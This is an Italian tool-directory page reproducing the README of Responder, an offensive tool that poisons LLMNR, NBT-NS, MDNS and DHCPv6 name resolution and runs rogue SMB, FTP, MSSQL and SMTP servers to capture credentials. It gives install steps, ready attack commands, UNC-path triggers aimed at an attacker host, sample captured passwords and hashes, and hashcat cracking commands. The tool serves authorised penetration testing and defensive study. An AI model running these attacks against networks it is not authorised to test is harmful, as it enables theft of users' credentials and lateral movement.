Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Responder — Responder è un avvelenatore di LLMNR, NBT-NS e MDNS, con server di autenticazione rogue HTTP/SMB/MSSQL/FTP/LDAP integrato che supporta NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP e autenticazione HTTP Basic. | Kitploit
Strumenti/GitHubGitHub/lgandx/responder
Password CrackingRicognizioneAttacchi alle PasswordEnumerazione DNS e SottodominiExploitMovimento LateraleRaccolta InformazioniSicurezza di RetePenetration TestingAutenticazioneFuzzing DNSRed Teaming
6.5k8671233 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Analisi DNS
Top in Movimento Laterale n.7
Top in Attacchi alle Password n.8
Top in Password Cracking n.6
GitHublgandx/responder

Responder

Responder è un avvelenatore di LLMNR, NBT-NS e MDNS, con server di autenticazione rogue HTTP/SMB/MSSQL/FTP/LDAP integrato che supporta NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP e autenticazione HTTP Basic.

Vedi Repository

Responder

Python Version License

Responder è un poisoner LLMNR, NBT-NS e MDNS con server di autenticazione rogue integrati per HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS e altro. Supporta NTLMv1/NTLMv2/LMv2, NTLMSSP esteso e vari metodi di autenticazione su oltre 15 protocolli.


Indice

  • Panoramica
  • Novità
  • Installazione
  • Avvio Rapido
  • Avvelenamento di Rete
  • Server Rogue
  • Configurazione
  • macOS
  • Risoluzione dei Problemi

Panoramica

Responder cattura le credenziali rispondendo alle richieste di risoluzione dei nomi LLMNR, NBT-NS e MDNS. Quando un client tenta di risolvere un nome host inesistente, Responder risponde, indirizzando il client verso la macchina dell'attaccante dove molteplici server di autenticazione rogue catturano le credenziali. Sono inclusi anche server rogue DHCP e DHCPv6, che possono essere abilitati separatamente.

Dati Catturati:

  • Hash NetNTLMv1/v2 - Decifrabili con hashcat/john
  • Hash Kerberos AS-REQ - Cracking offline (hashcat -m 7500)
  • Credenziali in chiaro - HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, ecc.
  • Challenge-response - CRAM-MD5, DIGEST-MD5

Novità

Questa versione include:

Miglioramenti DHCPv6 e DNS

  • ✅ DHCPv6 INFORMATION-REQUEST - Piena compatibilità con Windows 10/11
  • ✅ Filtraggio per Dominio - Domini specifici (DHCPv6 e DNS)
  • ✅ Annunci Router - Avvelenamento di rete IPv6 opzionale

Aggiornamenti del Server Email

  • ✅ SMTP STARTTLS - Cattura da client email moderni
  • ✅ IMAP STARTTLS - Porta 143 con aggiornamento TLS
  • ✅ IMAPS - SSL nativo sulla porta 993
  • ✅ POP3 Migliorato - Migliore compatibilità

Miglioramenti Kerberos

  • ✅ Forza AS-REQ - Forza l'autenticazione Kerberos.
  • ✅ Tenta Fallback NTLM - Dopo aver ottenuto l'autenticazione Kerberos, restituisce KDC_ERR_ETYPE_NOSUPP

Miglioramenti dei Protocolli

  • ✅ MSSQL - Cattura dell'autenticazione SQL Server
  • ✅ LDAP/LDAPS - Credenziali del servizio directory
  • ✅ RDP - Autenticazione Desktop Remoto
  • ✅ WinRM - Gestione remota di Windows
  • ✅ DCERPC - Autenticazione RPC di Windows

Installazione

Requisiti

  • Python 2.7 o Python 3.x
  • Linux (consigliati Ubuntu, Kali, Debian)
  • Privilegi di root

Dipendenze di Sistema```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

### Installare Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Verifica dell'installazione```bash

sudo python3 Responder.py --help

---

## Avvio rapido

### Avvelenamento base```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

Attacco DHCPv6```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

### Forza autenticazione HTTP Basic```bash
sudo python3 Responder.py -I eth0 -b -v

Abilita Proxy Auth + Rogue DHCP```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

---

## Avvelenamento della rete

### Avvelenamento LLMNR/NBT-NS/MDNS

**Scopo:** Rispondere ai fallimenti di risoluzione dei nomi

**Come funziona:**
1. Il client invia una query per un host inesistente
2. Responder risponde: "Sono quell'host"
3. Il client si connette all'attaccante
4. Credenziali catturate

**Configurazione:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

Utilizzo:```bash sudo python3 Responder.py -I eth0 -v

---

### Server DHCPv6

**Scopo:** Forzare i client a utilizzare il DNS dell'attaccante tramite IPv6

**Caratteristiche:**
- ✅ Supporto INFORMATION-REQUEST (Windows 10/11)
- ✅ Supporto SOLICIT/REQUEST
- ✅ Filtraggio dei domini (targeting chirurgico)
- ✅ Router Advertisement (opzionale)

**Come funziona:**
1. Windows invia DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
2. Responder risponde: DNS = IPv6 dell'attaccante
3. Windows dà priorità al DNS IPv6
4. Tutte le query DNS → attaccante
5. DNS poisoning → cattura delle credenziali

**Configurazione:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Utilizzo:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

**Risultato previsto:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

Server Rogue

Responder include 17+ server di autenticazione rogue:

Servizi File e Rete

Server SMB (Porte 445, 139)

Scopo: Catturare hash NetNTLM da condivisioni di file

Caratteristiche:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ Cattura hash NetNTLMv1/v2
  • ✅ NTLMSSP di sicurezza estesa
  • ✅ Firma della sessione disabilitata (consente relay)

Trigger:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

**Formato acquisito:**```
username::domain:challenge:response:blob

Cracking:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

**Configurazione:**```ini
[Responder Core]
SMB = On

FTP Server (Port 21)

Scopo: Catturare le credenziali FTP in chiaro

Caratteristiche:

  • ✅ Honeypot per login anonimo
  • ✅ Autenticazione USER/PASS
  • ✅ Cattura delle credenziali in chiaro

Attivatori:```bash ftp attacker-ip

Username: anything

Password: anything

**Formato Catturato:**```
[FTP] Cleartext: username:password

Configurazione:```ini [Responder Core] FTP = On

---

### Server di database

#### MSSQL Server (Porta 1433)

**Scopo:** Catturare l'autenticazione di Microsoft SQL Server

**Caratteristiche:**
- ✅ Autenticazione SQL Server
- ✅ Autenticazione Windows (NTLM)
- ✅ Credenziali SQL in chiaro
- ✅ Cattura hash NetNTLMv2

**Trigger:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

Formati catturati:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

**Configurazione:**```ini
[Responder Core]
SQL = On

Note:

  • Cattura sia l'autenticazione SQL che l'autenticazione Windows
  • Funziona con connessioni SSMS, sqlcmd, ADO.NET
  • Può catturare le credenziali di dominio tramite autenticazione Windows

Server Email

Server SMTP (Porta 25, 587)

Scopo: Catturare l'autenticazione del client email

Caratteristiche:

  • ✅ Supporto STARTTLS (client moderni)
  • ✅ AUTH PLAIN (testo in chiaro)
  • ✅ AUTH LOGIN (testo in chiaro)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)
Scarica lo strumento